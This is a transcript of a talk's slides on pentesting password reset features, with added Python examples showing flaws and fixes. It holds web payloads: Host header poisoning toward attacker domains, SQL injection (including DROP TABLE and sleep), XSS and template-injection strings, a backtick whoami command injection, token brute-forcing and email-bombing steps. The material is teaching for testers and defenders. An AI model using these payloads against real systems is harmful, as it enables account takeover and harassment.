
Pentesting Password Reset Functionality

Anugrah SR
January 23, 2023

This talk was part of RESET Hacker's Kerala's first session. Here we discuss:
Functionality hacking methodology: https://github.com/Anugrahsr/Functionality-Hacker
What is the password reset functionality
Flow of the password reset functionality
What can go wrong
Mindmap, checklist etc.

Recording can be found here: https://anugrahsr.in/

Transcript

  1. PENTESTING
    PASSWORD RESET
    FUNCTIONALITY
    - Anugrah SR

  2. ANUGRAH S R
    Cyber Security consultant at The SecOps Group
    Passive Bugbounty Hunter
    Synack Red Team Member
    Connect with me:
    Twitter: @cyph3r_asr | LinkedIn: anugrah-sr | Web: anugrahsr.in
    Blog: anugrahsr.in | p1boom.com

  3. AGENDA
    Functionality hacking methodology
    What is the password reset functionality
    Flow of the password reset functionality
    What can go wrong
    Mindmap, Checklist

  4. LOOKING FOR BUGS?
    Bug type wise? XSS, SQL Injection, SSRF
    Functionality wise?
    Hacking methodology

  5. LOOKING FOR BUGS?
    https://github.com/Anugrahsr/Functionality-Hacker

  6. Spot the Common One!

  7. Forgot Password?

  8. WHAT IS PASSWORD RESET?
    If a web app has a login, there will be a password reset function!
    To implement a proper user management system, applications integrate a
    Forgot Password service that lets the user request a password reset.

  9. WHAT COULD POSSIBLY
    GO WRONG HERE RIGHT?
    Let's see!

  10. MAALP and I found this interesting password reset page
    OTP

  11. WHAT IF?
    Let's look at the impact
    FULL ACCOUNT TAKEOVER
    TOKEN LEAKAGE
    PARAMETER POLLUTION
    SQL INJECTION
    GUESSABLE TOKEN
    MORE..
  12. PASSWORD RESET POISONING
    If the application builds the reset link from the Host header, request a password reset with an attacker-controlled Host.
    Websites that handle the value of the Host header in an unsafe way will send the victim a reset link that points at the attacker's domain.
    Normal request:
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    Poisoned request:
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: evilhost.com

  13. $resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/resetpassword.php?token=12345678-1234-1234.."; // vulnerable: the link is built from the client-supplied Host header


  15. Userinfo trick in the Host header:
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com:@evilhost.com
    X-Forwarded-Host override:
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    X-Forwarded-Host: attacker.com
    Duplicate Host header:
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    Host: attacker.com
    Host value containing an @:
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: [email protected]
    Lab:
    https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning
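The following is an added example, not code from the deck or its author: it reproduces the behaviour of the PHP one-liner on slide 13 in Python, runs the Host header variants from slides 12 and 15 through it, and puts a builder beside it that derives the link from configuration instead of the request. The canonical host, the token and the header sets are assumptions for the demo.

```python
# Added example (not from the slides): why a reset link built from the
# Host header is poisonable, and a builder that refuses untrusted hosts.
# ALLOWED_HOSTS, the token and the header sets are assumptions for the demo.
import re
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"example.com"}                 # assumed canonical host(s)
HOST_RE = re.compile(r"^([a-z0-9-]+(?:\.[a-z0-9-]+)*)(?::\d{1,5})?$", re.I)


def vulnerable_reset_url(headers, token):
    """Behaves like $_SERVER['HTTP_HOST'] on slide 13: the link inherits
    whatever host the client sent. Many stacks also let X-Forwarded-Host
    override Host, and keep the last of two duplicate Host headers."""
    host = headers.get("X-Forwarded-Host") or headers["Host"]
    if isinstance(host, list):            # duplicate Host header, last one wins
        host = host[-1]
    return f"https://{host}/resetpassword.php?token={token}"


def hardened_reset_url(headers, token):
    """The link is built from configuration, never from the request.
    Host is still validated, but only to reject odd requests early."""
    if "X-Forwarded-Host" in headers:     # only a trusted proxy may set this
        raise ValueError("X-Forwarded-Host not accepted")
    host = headers["Host"]
    if isinstance(host, list):
        raise ValueError("duplicate Host header")
    match = HOST_RE.match(host)
    if not match or match.group(1).lower() not in ALLOWED_HOSTS:
        raise ValueError(f"untrusted Host: {host!r}")
    canonical = sorted(ALLOWED_HOSTS)[0]
    return f"https://{canonical}/resetpassword.php?token={token}"


def link_host(url):
    """Where a browser would send the token when the victim clicks the link."""
    return urlsplit(url).hostname


def compare(headers, token="12345678-1234-1234"):
    """Returns (host the vulnerable link points at, whether the hardened
    builder accepted the request at all)."""
    poisoned_to = link_host(vulnerable_reset_url(headers, token))
    try:
        hardened_reset_url(headers, token)
        accepted = True
    except ValueError:
        accepted = False
    return poisoned_to, accepted


# Constructed header sets mirroring slides 12 and 15.
CASES = {
    "normal":           {"Host": "example.com"},
    "evil host":        {"Host": "evilhost.com"},
    "userinfo trick":   {"Host": "example.com:@evilhost.com"},
    "x-forwarded-host": {"Host": "example.com", "X-Forwarded-Host": "attacker.com"},
    "duplicate host":   {"Host": ["example.com", "attacker.com"]},
}

if __name__ == "__main__":
    for name, headers in CASES.items():
        target, accepted = compare(headers)
        print(f"{name:17s} vulnerable link -> {target:15s} hardened accepts: {accepted}")
```

The userinfo case is the interesting one: `example.com:@evilhost.com` passes a naive "starts with example.com" check, but a browser parses everything before the `@` as credentials and sends the token to evilhost.com, which is exactly what `urlsplit().hostname` reports here.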

  16. ATO: PARAMETER MANIPULATION
    Pollute the email parameter so that the reset token is delivered to an attacker-controlled address as well
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    [email protected]&[email protected]
    POST https://example.com/reset.php HTTP/1.1
    Accept: */*
    Content-Type: application/json
    Host: example.com
    [email protected]

  17. ATO: PARAMETER MANIPULATION (continued)
    [email protected]
    [email protected]
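An added example, not from the deck: a reset handler that reads the `email` parameter once for the account lookup and once for the mailer, so a polluted body makes it mail the token to both addresses, beside a handler that insists on a single value and always mails the address stored on the account. The account table, addresses and the JSON variant are assumptions for the demo.

```python
# Added example (not from the slides): what parameter pollution does to a
# reset handler that reads the email parameter in two different ways.
# ACCOUNTS and the addresses are constructed for the demo.
from urllib.parse import parse_qs

ACCOUNTS = {"victim@example.com": {"id": 1, "email": "victim@example.com"}}


def vulnerable_reset(body):
    """Looks the account up with the first value of `email`, then hands the
    whole value list to a mailer that joins it into one recipient string.
    Returns the recipient string, or None if no account matched."""
    values = parse_qs(body).get("email", [])
    if not values or values[0] not in ACCOUNTS:
        return None
    return ", ".join(values)          # victim AND attacker receive the link


def hardened_reset(body):
    """Exactly one email value, normalised, and the link goes to the address
    stored on the account, never to the submitted string.
    Returns the recipient, or None when the request must be ignored."""
    values = parse_qs(body, keep_blank_values=True).get("email", [])
    if len(values) != 1:
        return None                   # polluted or missing parameter
    account = ACCOUNTS.get(values[0].strip().lower())
    if account is None:
        return None                   # caller still answers with the generic message
    return account["email"]


def hardened_reset_json(payload):
    """Same rule for a JSON body: the value must be a single string,
    not a list, object or number (assumed JSON shape for the demo)."""
    value = payload.get("email")
    if not isinstance(value, str):
        return None
    account = ACCOUNTS.get(value.strip().lower())
    return account["email"] if account else None


if __name__ == "__main__":
    polluted = "email=victim@example.com&email=attacker@example.com"
    print("vulnerable:", vulnerable_reset(polluted))   # both addresses
    print("hardened:  ", hardened_reset(polluted))     # None
```

`parse_qs` hands back a list per key, which is what makes the bug easy to write: one layer takes `[0]`, another joins the list or takes `[-1]`. The fix is not to pick the "right" index but to refuse anything other than exactly one value and to send only to the stored address.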

  18. RESPONSE MANIPULATION
    Replace the bad response with a good one
    HTTP/1.1 401 Unauthorized
    {"message":"unsuccessful","statusCode":403,"errorDescription":"Unsuccessful"}
    HTTP/1.1 200 OK
    {"message":"success","statusCode":200,"errorDescription":"Success"}

  19. TOKEN LEAKAGE IN RESPONSE
    Check whether the token is returned in the response
    Try adding a .json extension to the endpoint, e.g. resetpassword.json
    GET /passwordReset.json HTTP/1.1
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8
    {
    "email" : "[email protected]" ,
    "token" : ******,
    "success" : "true"
    }
    GET /passwordReset HTTP/1.1
    email [email protected]
    HTTP/1.1 200 OK
    Content-Type: application/json; charset=utf-8

  20. TOKEN LEAKAGE
    Check whether the token is leaked in the response, JS files, etc.
    1 - Set Up Burp In Browser One
    2 - Reset Password In Browser One
    3 - Open The Password Reset Email In Browser Two
    4 - Copy The Token
    5 - Search Your Burp History For The Token

  21. RESET TOKEN LEAK VIA REFERER
    Once you have visited the reset token link, click through to any third-party website, e.g. Facebook
    Intercept the request and check the Referer header

  22. RESET TOKEN LEAK VIA REFERER
    GET /home HTTP/1.1
    Host: www.third_party.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Referer: https://company.com/resetpass?token=123-456-123-456
    Origin: https://www.company.com
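An added example, not from the deck: the "search your proxy history for the token" step from slides 20 to 22 as a script. It walks a list of captured HTTP messages and reports every place the token appears (request line, Referer, body) and whether the message went to a host outside the application. The captured messages, the first-party host list and the token value are constructed for the demo.

```python
# Added example (not from the slides): the "search your proxy history for
# the token" step from slides 20-22 as a script over captured messages.
# HISTORY, APP_HOSTS and TOKEN are constructed for the demo.
APP_HOSTS = {"company.com", "www.company.com"}   # assumed first-party hosts
TOKEN = "123-456-123-456"

HISTORY = [
    "POST /passwordReset HTTP/1.1\nHost: www.company.com\n"
    "Content-Type: application/x-www-form-urlencoded\n\nemail=victim@example.com",
    "HTTP/1.1 200 OK\nContent-Type: application/json; charset=utf-8\n\n"
    '{"email": "victim@example.com", "token": "123-456-123-456", "success": "true"}',
    "GET /resetpass?token=123-456-123-456 HTTP/1.1\nHost: company.com\n\n",
    "GET /home HTTP/1.1\nHost: www.third_party.com\nUser-Agent: Mozilla/5.0\n"
    "Referer: https://company.com/resetpass?token=123-456-123-456\n\n",
]


def parse_message(raw):
    """Split a raw HTTP request or response into (start line, headers, body)."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def find_token_leaks(history, token):
    """Every message in which the token appears, and where inside it.
    A hit on a host outside APP_HOSTS is a leak to a third party."""
    hits = []
    for index, raw in enumerate(history):
        start, headers, body = parse_message(raw)
        host = headers.get("host", "")
        where = []
        if token in start:
            where.append("request-line")     # token in the URL: logs, history, Referer
        if token in headers.get("referer", ""):
            where.append("referer")
        if token in body:
            where.append("body")             # e.g. the .json variant on slide 19
        if where:
            hits.append({"index": index, "host": host, "where": where,
                         "third_party": bool(host) and host not in APP_HOSTS})
    return hits


if __name__ == "__main__":
    for hit in find_token_leaks(HISTORY, TOKEN):
        print(hit)
```

On the defensive side the Referer leak goes away when the reset page sends `Referrer-Policy: no-referrer` and, better, when the first load of the link consumes the token server-side and redirects to a URL without it, so nothing the user navigates from afterwards still carries the secret.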

  23. GUESSABLE TOKEN
    Find out how the password reset token is generated: from a timestamp, user ID or email,
    or with weak cryptography
    POST /resetPassword HTTP/1.1
    Host: www.company.com
    Content-Type: application/x-www-form-urlencoded
    Origin: https://www.company.com
    Content-Length: Number
    [email protected]&token=

  24. BRUTE FORCE THE TOKEN
    Find the password reset token by force!
    Use IP rotation, additional headers, etc.
    POST /resetPassword/change HTTP/1.1
    Host: www.company.com
    Content-Type: application/x-www-form-urlencoded
    Origin: https://www.company.com
    Content-Length: Number
    [email protected]&token=FUZZ&newpass=DontHackme!

  25. EXPERIMENT WITH THE TOKEN
    Experiment with the password reset token!
    Remove the token completely
    Change the token to 0, 1, -1, etc.
    Use the token value null/nil
    Use an expired token
    Try an array of old tokens
    Use Sequencer to check whether the token has any patterns
    Add special characters
    Change the request method / content type
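An added example for slides 23 to 25, not from the deck: a constructed weak token scheme (MD5 of email plus issue time) beside a CSPRNG token, and the brute-force loop from slide 24 run against a stand-in server. With the weak scheme the whole candidate space is the timestamp window; with the strong one the same loop never lands. The server class, addresses and window size are assumptions for the demo.

```python
# Added example (not from the slides): a reset token derived from guessable
# inputs (email + timestamp hashed with MD5) can be recovered by trying the
# timestamp window, while a CSPRNG token cannot. ResetServer is a stand-in.
import hashlib
import secrets


def weak_token(email, issued_at):
    """Constructed weak scheme: md5(email || unix seconds). Everything the
    attacker needs is public or guessable to within a few minutes."""
    return hashlib.md5(f"{email}{int(issued_at)}".encode()).hexdigest()


def strong_token():
    """256 bits from the OS CSPRNG; no relationship to user, time or counter."""
    return secrets.token_urlsafe(32)


class ResetServer:
    """Stand-in for the /resetPassword/change endpoint on slide 24."""

    def __init__(self, email, token):
        self.email, self.token = email, token
        self.attempts = 0

    def change_password(self, email, token, new_password):
        self.attempts += 1
        return email == self.email and secrets.compare_digest(token, self.token)


def guess_weak_token(server, email, approx_time, window=60):
    """Brute force every second in [approx_time - window, approx_time + window].
    Returns the accepted token, or None if none of the candidates worked."""
    centre = int(approx_time)
    for ts in range(centre - window, centre + window + 1):
        candidate = weak_token(email, ts)
        if server.change_password(email, candidate, "DontHackme!"):
            return candidate
    return None


if __name__ == "__main__":
    victim, issued = "victim@example.com", 1_700_000_000
    weak = ResetServer(victim, weak_token(victim, issued))
    found = guess_weak_token(weak, victim, issued + 17)   # attacker is 17 s off
    print("weak token recovered:", found is not None, "after", weak.attempts, "attempts")
    strong = ResetServer(victim, strong_token())
    print("strong token recovered:", guess_weak_token(strong, victim, issued + 17) is not None)
```

The same reasoning covers tokens built from the user ID or email alone (a candidate set of size one) and short numeric OTPs (a candidate set you can enumerate), which is why the rate limiting on slide 36 and the unpredictability of the token are two separate requirements, not substitutes.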

  26. IDN HOMOGRAPH ATTACK
    Create an account with email [email protected]
    Now generate a reset password link for the email test@gmáil.com.burpcollaborator.net
    POST /passwordreset HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: Number
    email=test@gmáil.com.id.burpcollaborator.net

  27. LIST OF PAYLOADS AS EMAIL ADDRESSES
    test+(alert(0))@gmail.com
    test(alert(0))@gmail.com
    test@gmail(alert(0)).com
    "alert(0)"@gmail.com
    "<%= 7 * 7 %>"@gmail.com
    test+(${{7*7}})@gmail.com
    "' OR 1=1 -- '"@gmail.com
    "test); DROP TABLE users;--"@gmail.com
    test@[id.collaborator.net]
    %@gmail.com

  28. XSS
    Test for XSS with the payload [email protected]">alert(document.domain)
    GET /[email protected]">alert(document.domain) HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Referer: https://previous.com/path
    Origin: https://www.company.com

  29. TIME BASED SQL INJECTION
    GET /[email protected]'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0, sunil
    Content-Type: application/x-www-form-urlencoded
    Referer: https://previous.com/path
    Origin: https://www.company.com

  30. OS COMMAND INJECTION
    Reset password with email test@`whoami`.id.burpcollaborator.net
    POST /passwordreset HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: Number
    email=test@`whoami`.id.collaborator.net
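An added example, not from the deck, covering slides 26 to 30 from the defender's side: the payload list from slide 27, the homograph address from slide 26 and the backtick address from slide 30 are kept as string literals and run through a deliberately strict email check, and a parameterised SQLite lookup shows the injection strings matching nothing and dropping nothing. The XSS line is constructed because the slide's own markup did not survive extraction; the user table is constructed as well.

```python
# Added example (not from the slides): the payload list from slides 26-30
# run through a deliberately strict email check, plus a parameterised
# lookup so the SQL payloads stay inert. The XSS string and the user table
# are constructed for the demo.
import re
import sqlite3

PAYLOADS = [
    "test+(alert(0))@gmail.com",
    "test(alert(0))@gmail.com",
    "test@gmail(alert(0)).com",
    '"alert(0)"@gmail.com',
    '"<%= 7 * 7 %>"@gmail.com',
    "test+(${{7*7}})@gmail.com",
    "\"' OR 1=1 -- '\"@gmail.com",
    '"test); DROP TABLE users;--"@gmail.com',
    "test@[id.collaborator.net]",
    "%@gmail.com",
    "test@gmáil.com.id.burpcollaborator.net",        # IDN homograph (slide 26)
    "test@`whoami`.id.collaborator.net",              # command injection (slide 30)
    'test@example.com"><script>alert(document.domain)</script>',  # constructed XSS
]

LOCAL_RE = re.compile(r"^[A-Za-z0-9._+-]{1,64}$")
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def valid_reset_email(value):
    """Much stricter than RFC 5322 on purpose: quoted local parts, comments,
    IP literals, '%' and non-ASCII are refused because a reset form never
    needs them and every payload above depends on one of them."""
    if not isinstance(value, str) or len(value) > 254 or value != value.strip():
        return False
    if not value.isascii():                 # rejects gmáil.com and friends
        return False
    local, sep, domain = value.rpartition("@")
    if not sep or not LOCAL_RE.match(local):
        return False
    labels = domain.split(".")
    if len(labels) < 2 or not all(LABEL_RE.match(label) for label in labels):
        return False
    return labels[-1].isalpha()


def accepted_payloads(payloads=PAYLOADS):
    """Payloads the validator lets through (should be an empty list)."""
    return [p for p in payloads if valid_reset_email(p)]


def demo_db():
    """Constructed user table for the lookup demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE)")
    conn.execute("INSERT INTO users (email) VALUES (?)", ("victim@example.com",))
    return conn


def find_user(conn, email):
    """Parameterised: the value can never alter the statement, so the
    sleep()/DROP TABLE payloads are just strings that match no row."""
    return conn.execute("SELECT id, email FROM users WHERE email = ?", (email,)).fetchone()


def user_count(conn):
    return conn.execute("SELECT count(*) FROM users").fetchone()[0]


if __name__ == "__main__":
    print("accepted payloads:", accepted_payloads())
    conn = demo_db()
    for p in PAYLOADS:
        find_user(conn, p)
    print("rows after running every payload through the lookup:", user_count(conn))
```

Validation is the first gate, not the only one: the lookup stays parameterised and the address is never interpolated into a shell command or an unescaped HTML template, so a payload that slips past a future relaxation of the regex still has nothing to land on.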

  31. IDOR
    Test with your own reset token and the victim's email ID / user ID.
    POST /passwordreset HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: Number
    [email protected]&token=
    POST /passwordreset HTTP/1.1
    Host: www.company.com
    User-Agent: Mozilla/5.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: Number
    [email protected]&token=

  32. XXE
    If the password reset endpoint accepts both JSON and XML,
    use the Content Type Converter Burp extension to convert the request from JSON to XML and add your payload
    POST /resetPassword/change HTTP/1.1
    Host: www.company.com
    Content-Type: application/xml

    %asd;%c;]>
    %rrr;**********

  33. MFA AUTO DISABLING
    Sometimes MFA is automatically disabled after a password reset
    Enable 2FA
    Logout
    Password Reset
    2FA is auto disabled

  34. SESSION EXPIRATION
    Test for insufficient session expiration after a password change
    Open the account in two different browsers
    In browser 1, reset the password
    Check whether the session in browser 2 has been invalidated

  35. USER ENUMERATION
    Enumerate usernames/email IDs based on differences in the web app's response
    invalid email/username: user doesn't exist
    valid email/username: Password reset link has been sent to your email

  36. MISSING RATE LIMITING
    Email bombing!
    Send the password reset request to Burp Intruder
    Start the attack
    Look at the chaos you created in the victim's email account
    Tip: [email protected]
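An added example for slides 35 and 36 together, not from the deck: one reset endpoint that returns the same status and text whether or not the account exists, and throttles per address and per source IP so an Intruder run, even with rotating IPs, cannot bomb the victim's inbox. Account set, limits and window are assumptions for the demo.

```python
# Added example (not from the slides): one reset endpoint that answers
# slides 35 and 36 together: the same response whether or not the account
# exists, and per-address plus per-IP throttling that stops email bombing
# even when the sender rotates IPs. ACCOUNTS and the limits are assumptions.
import time
from collections import deque

GENERIC = "If that address has an account, a password reset link has been sent."
ACCOUNTS = {"victim@example.com"}        # constructed


class ResetEndpoint:
    def __init__(self, per_email=3, per_ip=10, window=3600):
        self.per_email, self.per_ip, self.window = per_email, per_ip, window
        self.by_email, self.by_ip = {}, {}
        self.outbox = []                  # what the mailer would actually send

    def _allow(self, table, key, limit, now):
        """Sliding-window counter: at most `limit` events per `window` seconds."""
        events = table.setdefault(key, deque())
        while events and now - events[0] > self.window:
            events.popleft()
        if len(events) >= limit:
            return False
        events.append(now)
        return True

    def request_reset(self, email, ip, now=None):
        """Always 200 with the same text. Whether mail goes out is decided
        silently; enqueue it asynchronously in a real app so response timing
        does not reveal what the text hides."""
        now = time.time() if now is None else now
        email = email.strip().lower()
        if (self._allow(self.by_ip, ip, self.per_ip, now)
                and self._allow(self.by_email, email, self.per_email, now)
                and email in ACCOUNTS):
            self.outbox.append((email, now))
        return 200, GENERIC


if __name__ == "__main__":
    ep = ResetEndpoint()
    print(ep.request_reset("victim@example.com", "203.0.113.5", now=0))
    print(ep.request_reset("nobody@example.com", "203.0.113.5", now=0))
    for i in range(50):                   # Intruder run with rotating source IPs
        ep.request_reset("victim@example.com", f"198.51.100.{i}", now=i)
    print("mails actually sent:", len(ep.outbox))
```

The per-address counter is the one that defeats IP rotation; the per-IP counter only cheapens the common case. Both are keyed on the normalised address so `Victim@Example.com` and `victim@example.com` share a budget.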

  37. REUSABLE TOKEN
    Check whether the token can be reused, or used after it should have expired.
    Request a password reset
    Don't use the link
    Change the email address to a new email in account settings
    See if the old token can still be used
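An added example, not from the deck, that gives the lifecycle rules behind slides 31, 33, 34 and 37 a concrete shape: a token store in which tokens are single use, expire after a short TTL, are bound to the account they were issued for (so an attacker's own token does nothing for the victim's email), are voided when the address changes, and a reset that revokes every other session while leaving MFA untouched. The account model, the TTL and the hashing parameters are assumptions for the demo.

```python
# Added example (not from the slides): token lifecycle rules for slides 31,
# 33, 34 and 37 in one small store: single use, short TTL, bound to the
# account, voided when the address changes, and a reset that revokes every
# other session without touching MFA. Account model and TTL are assumptions.
import hashlib
import secrets


class Account:
    def __init__(self, email):
        self.email = email
        self.password_hash = None
        self.mfa_enabled = False
        self.sessions = set()          # live session IDs


def _hash_token(raw):
    # Store a hash so a database read does not hand out usable tokens.
    return hashlib.sha256(raw.encode()).hexdigest()


class ResetTokenStore:
    TTL = 15 * 60                      # seconds; assumption

    def __init__(self):
        self.tokens = {}               # token hash -> (email, issued_at)

    def issue(self, account, now):
        self.revoke_for(account.email)     # one outstanding token per account
        raw = secrets.token_urlsafe(32)
        self.tokens[_hash_token(raw)] = (account.email, now)
        return raw

    def revoke_for(self, email):
        self.tokens = {h: rec for h, rec in self.tokens.items() if rec[0] != email}

    def consume(self, raw, account, now):
        """True once, and only for the account the token was issued to."""
        record = self.tokens.pop(_hash_token(raw), None)   # single use, even on failure
        if record is None:
            return False
        email, issued_at = record
        return email == account.email and now - issued_at <= self.TTL


def reset_password(store, accounts, raw_token, email, new_password, now):
    account = accounts.get(email)
    if account is None or not store.consume(raw_token, account, now):
        return False
    salt = secrets.token_bytes(16)
    account.password_hash = (salt, hashlib.pbkdf2_hmac("sha256", new_password.encode(), salt, 100_000))
    account.sessions.clear()           # slide 34: every other session dies
    # slide 33: MFA state is deliberately left alone
    return True


def change_email(store, accounts, account, new_email):
    """Slide 37: a token requested for the old address must not survive."""
    store.revoke_for(account.email)
    accounts.pop(account.email, None)
    account.email = new_email
    accounts[new_email] = account


if __name__ == "__main__":
    store = ResetTokenStore()
    victim = Account("victim@example.com")
    victim.mfa_enabled, victim.sessions = True, {"s1", "s2"}
    accounts = {victim.email: victim}
    token = store.issue(victim, now=0)
    print("first use:", reset_password(store, accounts, token, victim.email, "N3w-pass", now=60))
    print("sessions left:", victim.sessions, "mfa still on:", victim.mfa_enabled)
    print("second use:", reset_password(store, accounts, token, victim.email, "again", now=61))
```

Popping the record before checking the account or the expiry is intentional: a token that fails for any reason is burned, so an attacker cannot keep probing the same value with different emails (the IDOR case on slide 31).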

  38. MINDMAPS
    https://twitter.com/N008x/status/1302515523557548032/photo/1 - Gaurav Popalghat
    https://xmind.app/m/nZwbdk - Harsh Bothra

  39. RESOURCES
    10 Password Reset Flaws - Anugrah SR (Blog, Slides)
    Functionality Hacker - Anugrah SR
    ATO Password Reset - Mahmoud M. Awali (Slides)
    Common Vulnerabilities In Forget Password - Harsh Bothra (MindMap)

  40. https://github.com/Anugrahsr/Functionality-Hacker

  41. YOU'RE ONLY AS STRONG AS
    YOUR PASSWORD!

  42. THANKS FOR LISTENING TO ME!
    Twitter
    @cyph3r_asr
    LinkedIn
    @anugrah-sr
    www.anugrahsr.in
    Slides will be available here:
